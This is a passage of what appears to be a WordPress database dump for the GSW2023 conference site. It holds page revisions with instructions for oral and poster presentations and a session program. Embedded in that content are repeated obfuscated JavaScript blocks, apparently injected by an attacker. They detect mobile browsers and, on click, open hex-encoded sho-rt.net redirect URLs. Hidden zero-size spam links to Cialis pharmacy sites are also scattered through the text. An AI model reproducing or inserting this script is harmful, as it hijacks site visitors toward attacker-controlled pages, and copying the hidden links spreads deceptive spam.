)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismall.com/\">犀利士5mg</a>\n</span>x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-10-03 13:19:11','2023-10-03 13:19:11','',5132,'https://gsw2023.com/?p=5492',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5493,0,'2023-10-03 13:19:11','2023-10-03 13:19:11','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"http://www.cialisae.com/\">犀利士</a>\n</span>will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c8<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialistw.cc/\">犀利士</a>\n</span>5ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-10-03 13:19:11','2023-10-03 13:19:11','',5139,'https://gsw2023.com/?p=5493',0,'revision','',0),
(5494,0,'2023-10-03 13:19:12','2023-10-03 13:19:12','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-10-03 13:19:12','2023-10-03 13:19:12','',5122,'https://gsw2023.com/?p=5494',0,'revision','',0),
